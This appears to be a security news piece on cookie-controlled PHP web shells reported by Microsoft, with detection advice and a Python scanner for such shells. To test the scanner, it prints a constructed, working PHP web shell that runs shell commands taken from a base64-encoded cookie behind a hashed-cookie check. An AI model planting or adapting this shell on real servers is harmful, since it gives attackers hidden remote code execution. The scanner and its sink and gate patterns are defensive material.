Microsoft’s Defender Security Research Team has uncovered a new technique used by threat actors to control PHP-based web shells on Linux servers, leveraging HTTP cookies as a control channel to execute remote code.
Unlike the usual pattern, these shells take neither their trigger nor their instructions from the URL query string or the request body. Cookie values set by the operators on their own requests gate execution and carry the control traffic, so the request lines and bodies that WAF rules, access-log review and most web-shell scanners concentrate on look unremarkable; the default combined access-log format of Apache and nginx does not record the Cookie header at all, which is what makes the technique quieter and harder to detect.
The cookie channel is about stealth, not persistence. Surviving a reboot is handled separately: on the compromised Linux servers the operators scheduled cron jobs that re-establish their access, and the cookie-driven shell then gives them remote code execution on that foothold.
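The following is an added example, not Microsoft's code or a sample from the report: a constructed, minimal PHP file that gates execution on one cookie and takes its command from another, placed next to a benign file that merely reads a cookie, and a small Python scanner that flags the malicious pattern (cookie-derived data reaching a code or command sink, and an `if` that compares a cookie value as a gate) while leaving the benign file alone. Sink names, regular expressions and both PHP files are assumptions chosen for illustration.

```python
import re
from typing import Dict, List, Set

# Constructed sample of a cookie-gated PHP web shell (illustrative, not a real sample):
# execution is gated on one cookie and the command arrives in another, so neither the
# query string nor the POST body carries anything suspicious.
SUSPECT_PHP = r"""<?php
// gate: run only when the cookie carries the operator's token
if (isset($_COOKIE['sess']) && md5($_COOKIE['sess']) === 'e2fc714c4727ee9395f324cd2e7f331f') {
    $cmd = base64_decode($_COOKIE['data']);
    echo shell_exec($cmd);
}
?>"""

# Constructed benign file that also reads a cookie, to show that mere cookie use is not flagged.
BENIGN_PHP = r"""<?php
session_start();
$lang = isset($_COOKIE['lang']) ? htmlspecialchars($_COOKIE['lang']) : 'en';
echo "<html lang=\"$lang\">";
?>"""

# PHP functions that turn a string into code or a shell command (assumed list, extend as needed).
SINKS = ("eval", "assert", "system", "shell_exec", "exec", "passthru",
         "popen", "proc_open", "pcntl_exec", "create_function")
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(", re.IGNORECASE)
# `$var = <expr>;` on one line; `(?!=)` keeps == and === from being read as assignments.
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?!=)\s*(.+?);")
VAR_RE = re.compile(r"\$[A-Za-z_]\w*")
# An `if` whose condition compares a cookie value, directly or through a hash: the gate.
GATE_RE = re.compile(r"\bif\s*\(.*\$_COOKIE.*(===|==|md5|sha1|hash|strcmp)", re.IGNORECASE)


def tainted_vars(src: str) -> Set[str]:
    """Variables that (transitively) receive data from $_COOKIE: a fixpoint over one-line assignments."""
    tainted = {"$_COOKIE"}
    changed = True
    while changed:
        changed = False
        for m in ASSIGN_RE.finditer(src):
            lhs, rhs = m.group(1), m.group(2)
            if lhs not in tainted and any(v in tainted for v in VAR_RE.findall(rhs)):
                tainted.add(lhs)
                changed = True
    return tainted


def scan_php(src: str) -> List[Dict]:
    """Flag cookie gates and cookie-derived data reaching a code/command sink."""
    tainted = tainted_vars(src)
    findings: List[Dict] = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if GATE_RE.search(line):
            findings.append({"line": lineno, "kind": "cookie_gate", "text": line.strip()})
        for m in SINK_RE.finditer(line):
            args = line[m.end():]  # text after the opening parenthesis of the sink call
            if any(v in tainted for v in VAR_RE.findall(args)):
                findings.append({"line": lineno, "kind": "cookie_to_sink",
                                 "sink": m.group(1).lower(), "text": line.strip()})
    return findings


if __name__ == "__main__":
    for name, src in (("suspect.php", SUSPECT_PHP), ("benign.php", BENIGN_PHP)):
        for f in scan_php(src):
            print(f"{name}:{f['line']}: {f['kind']} {f['text']}")
```

Run against the two constructed files, the scanner reports the gate on line 3 and the `shell_exec($cmd)` on line 5 of the suspect file, and nothing for the benign one. The scanner is a source-level heuristic: obfuscated shells that assemble function names at run time will slip past it, and because the default access-log formats omit cookies, a log-based check needs the Cookie header added to the log format first (Apache `%{Cookie}i`, nginx `$http_cookie`) and still has to cope with the fact that a gate cookie looks like any session token.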
Microsoft’s findings show web-shell tradecraft moving away from the request fields defenders inspect by default, so monitoring has to follow it: record or inspect Cookie headers where web shells are a concern, review cron entries created under the web-server account, and scan web roots for PHP that feeds $_COOKIE values into eval, system or similar functions.
The discovery is also a reminder of the basics: regular system monitoring, secure coding practices and keeping software up to date, since a shell still has to be planted through an initial compromise before its cookie channel matters at all. As threat actors keep adapting their tooling, organizations need their detection to adapt with it.
Source: Original Article
